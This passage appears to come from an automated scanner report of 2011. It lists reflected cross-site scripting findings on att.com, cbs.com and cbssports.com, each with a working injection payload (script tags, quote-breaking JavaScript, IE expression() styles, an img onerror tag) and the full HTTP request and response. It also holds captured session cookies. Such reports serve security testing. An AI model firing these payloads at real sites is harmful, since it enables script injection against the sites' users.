Set-Cookie: TLTHID=8039E25E71251071657CDF339FAEDDE3; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=vTT7N4lTTvfpG1Qk6pB5TMfBQMjm9bQQMTthL1yMDLfDVYW8rl8W!-2067242516; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/registrationAction.olamexecute6579b"><img src=a onerror=alert(1)>6a711fed7d8">
...[SNIP]...

3.738. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs.com
Path:	/sitecommon/includes/cacheable/combine.php

Issue detail

The value of the files request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f683'%3balert(1)//72baedce5bf was submitted in the files parameter. This input was echoed as 1f683';alert(1)//72baedce5bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sitecommon/includes/cacheable/combine.php?type=js&files=/sitecommon/js/omniture.min.js|/sitecommon/js/userobject.min.js|/hp/2010/js/jquery.tools.min.js|/hp_2009/js/dw_site.js|/sitecommon/js/dw_global.js1f683'%3balert(1)//72baedce5bf HTTP/1.1
Host: www.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-Real-Server: ws3176.drt.cbsig.net
Content-Type: application/javascript
Expires: Wed, 27 Apr 2011 23:14:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:14:34 GMT
Connection: close
Content-Length: 107046

// Loading "/sitecommon/js/omniture.min.js"

Array.prototype.jsonClass=function(){var x=this;var constr=function(){var a=arguments;var u;for(var i=0;i<x.length;i++){if(typeof x[i]=="object"){for(var
...[SNIP]...
<"1.9"?" mousemove":"")})(jQuery);

// Loading "/hp_2009/js/dw_site.js"

DW_onid = "1";
DW_page_type = "2000";

// Loading "/sitecommon/js/dw_global.js1f683';alert(1)//72baedce5bf"

3.739. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs.com
Path:	/sitecommon/includes/cacheable/combine.php

Issue detail

The value of the files request parameter is copied into the HTML document as plain text between tags. The payload 67425<script>alert(1)</script>f652758675a was submitted in the files parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitecommon/includes/cacheable/combine.php?type=js&files=67425<script>alert(1)</script>f652758675a HTTP/1.1
Host: www.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-Real-Server: ws3229.drt.cbsig.net
Content-Type: application/javascript
Expires: Wed, 27 Apr 2011 23:14:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:14:34 GMT
Connection: close
Content-Length: 59

// Loading "67425<script>alert(1)</script>f652758675a"

3.740. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs.com
Path:	/sitecommon/includes/cacheable/combine.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20a74'%3balert(1)//39d43ffaebc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20a74';alert(1)//39d43ffaebc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sitecommon/includes/cacheable/combine.php?type=js&files=/sitecommon/js/omniture.min.js|/sitecommon/js/userobject.min.js|/hp/2010/js/jquery.tools.min.js|/hp_2009/js/dw_site.js|/sitecommon/js/dw_globa/20a74'%3balert(1)//39d43ffaebcl.js HTTP/1.1
Host: www.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-Real-Server: ws3175.drt.cbsig.net
Content-Type: application/javascript
Expires: Wed, 27 Apr 2011 23:14:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:14:35 GMT
Connection: close
Content-Length: 107047

// Loading "/sitecommon/js/omniture.min.js"

Array.prototype.jsonClass=function(){var x=this;var constr=function(){var a=arguments;var u;for(var i=0;i<x.length;i++){if(typeof x[i]=="object"){for(var
...[SNIP]...
<"1.9"?" mousemove":"")})(jQuery);

// Loading "/hp_2009/js/dw_site.js"

DW_onid = "1";
DW_page_type = "2000";

// Loading "/sitecommon/js/dw_globa/20a74';alert(1)//39d43ffaebcl.js"

3.741. http://www.cbssports.com/ads/local-page.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/ads/local-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57539"style%3d"x%3aexpression(alert(1))"03874e42a21 was submitted in the REST URL parameter 2. This input was echoed as 57539"style="x:expression(alert(1))"03874e42a21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ads/57539"style%3d"x%3aexpression(alert(1))"03874e42a21 HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; MADTEST=1; fsr.a=1303941360515

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:57:36 GMT
Server: Apache
Set-Cookie: last_access=1303941456; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 21:57:36 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 132871

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/ads/57539"style="x:expression(alert(1))"03874e42a21">
...[SNIP]...

3.742. http://www.cbssports.com/data/community/author// [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/data/community/author//

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30d6a"style%3d"x%3aexpression(alert(1))"a0a0610fc84 was submitted in the REST URL parameter 1. This input was echoed as 30d6a"style="x:expression(alert(1))"a0a0610fc84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /data30d6a"style%3d"x%3aexpression(alert(1))"a0a0610fc84/community/author//?as=json HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; last_access=1303946325; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1303946335587}; fsr.a=1303946339697

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:28 GMT
Server: Apache
Set-Cookie: last_access=1303946368; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:28 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 132942

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/data30d6a"style="x:expression(alert(1))"a0a0610fc84/community/author">
...[SNIP]...

3.743. http://www.cbssports.com/data/community/author// [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/data/community/author//

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2627"style%3d"x%3aexpression(alert(1))"c40800da5fa was submitted in the REST URL parameter 2. This input was echoed as f2627"style="x:expression(alert(1))"c40800da5fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /data/communityf2627"style%3d"x%3aexpression(alert(1))"c40800da5fa/author//?as=json HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; last_access=1303946325; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1303946335587}; fsr.a=1303946339697

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:30 GMT
Server: Apache
Set-Cookie: last_access=1303946370; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:30 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 132942

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/data/communityf2627"style="x:expression(alert(1))"c40800da5fa/author">
...[SNIP]...

3.744. http://www.cbssports.com/data/community/author// [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/data/community/author//

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298b9"style%3d"x%3aexpression(alert(1))"3bbcf8a74eb was submitted in the REST URL parameter 3. This input was echoed as 298b9"style="x:expression(alert(1))"3bbcf8a74eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /data/community/author298b9"style%3d"x%3aexpression(alert(1))"3bbcf8a74eb//?as=json HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; last_access=1303946325; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1303946335587}; fsr.a=1303946339697

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:33 GMT
Server: Apache
Set-Cookie: last_access=1303946373; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:33 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 132942

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/data/community/author298b9"style="x:expression(alert(1))"3bbcf8a74eb">
...[SNIP]...

3.745. http://www.cbssports.com/data/community/content-thread/566165/1/10/newest/tennis/get/p [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/data/community/content-thread/566165/1/10/newest/tennis/get/p

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeadd"style%3d"x%3aexpression(alert(1))"55bcf3fa21e was submitted in the REST URL parameter 1. This input was echoed as aeadd"style="x:expression(alert(1))"55bcf3fa21e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dataaeadd"style%3d"x%3aexpression(alert(1))"55bcf3fa21e/community/content-thread/566165/1/10/newest/tennis/get/p?as=json&action=get HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; last_access=1303946325; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1303946335587}; fsr.a=1303946339697

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:42 GMT
Server: Apache
Set-Cookie: last_access=1303946382; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:42 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 133185

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/dataaeadd"style="x:expression(alert(1))"55bcf3fa21e/community/content-thread/566165/1/10/newest/tennis/get/p">
...[SNIP]...

3.746. http://www.cbssports.com/data/community/content-thread/566165/1/10/newest/tennis/get/p [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/data/community/content-thread/566165/1/10/newest/tennis/get/p

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc118"style%3d"x%3aexpression(alert(1))"73cef2f234 was submitted in the REST URL parameter 2. This input was echoed as fc118"style="x:expression(alert(1))"73cef2f234 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /data/communityfc118"style%3d"x%3aexpression(alert(1))"73cef2f234/content-thread/566165/1/10/newest/tennis/get/p?as=json&action=get HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; last_access=1303946325; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1303946335587}; fsr.a=1303946339697

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:45 GMT
Server: Apache
Set-Cookie: last_access=1303946385; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:45 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 133180

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/data/communityfc118"style="x:expression(alert(1))"73cef2f234/content-thread/566165/1/10/newest/tennis/get/p">
...[SNIP]...

3.747. http://www.cbssports.com/data/community/content-thread/566165/1/10/newest/tennis/get/p [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/data/community/content-thread/566165/1/10/newest/tennis/get/p

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4917"style%3d"x%3aexpression(alert(1))"824b10357e1 was submitted in the REST URL parameter 3. This input was echoed as b4917"style="x:expression(alert(1))"824b10357e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /data/community/content-threadb4917"style%3d"x%3aexpression(alert(1))"824b10357e1/566165/1/10/newest/tennis/get/p?as=json&action=get HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; last_access=1303946325; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1303946335587}; fsr.a=1303946339697

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:47 GMT
Server: Apache
Set-Cookie: last_access=1303946387; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:47 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 133184

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/data/community/content-threadb4917"style="x:expression(alert(1))"824b10357e1/566165/1/10/newest/tennis/get/p">
...[SNIP]...

3.748. http://www.cbssports.com/tennis [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2fce"style%3d"x%3aexpression(alert(1))"aadfa7e1249 was submitted in the REST URL parameter 1. This input was echoed as e2fce"style="x:expression(alert(1))"aadfa7e1249 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennise2fce"style%3d"x%3aexpression(alert(1))"aadfa7e1249 HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; mad_rsi_segs=; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:28 GMT
Server: Apache
Set-Cookie: last_access=1303946248; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:17:28 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 132800

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennise2fce"style="x:expression(alert(1))"aadfa7e1249">
...[SNIP]...

3.749. http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14a05"style%3d"x%3aexpression(alert(1))"013071ef33a was submitted in the REST URL parameter 1. This input was echoed as 14a05"style="x:expression(alert(1))"013071ef33a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennis14a05"style%3d"x%3aexpression(alert(1))"013071ef33a/players/playerpage/566165 HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
